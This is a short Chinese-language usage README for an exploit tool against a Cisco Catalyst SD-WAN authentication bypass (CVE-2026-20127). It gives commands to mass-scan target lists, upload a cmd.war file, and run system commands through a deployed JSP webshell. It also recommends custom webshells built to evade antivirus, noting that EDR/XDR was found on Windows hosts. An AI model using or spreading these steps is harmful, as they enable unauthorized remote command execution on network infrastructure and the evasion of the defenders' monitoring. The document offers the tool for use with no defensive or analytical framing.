Cisco Catalyst SD-WAN 身份验证绕过漏洞(CVE-2026-20127)漏洞利用EXP
python scan.py -f targets.txt
python scan.py -f targets.txt -v
python scan.py -f targets.txt -t 10 -o vulnerable.txt
python scan.py -f targets.txt -w cmd.war
python scan.py -f targets.txt -w cmd.war t 10 -o vulnerable.txt
漏洞复现成功后访问/cmd.gz/cmd.jsp?cmd=whoami 会在页面显示结果
如果需要换成webshell,请自己制作war包(建议使用免杀马,经过测试存在Windows系统会有EDR或XDR)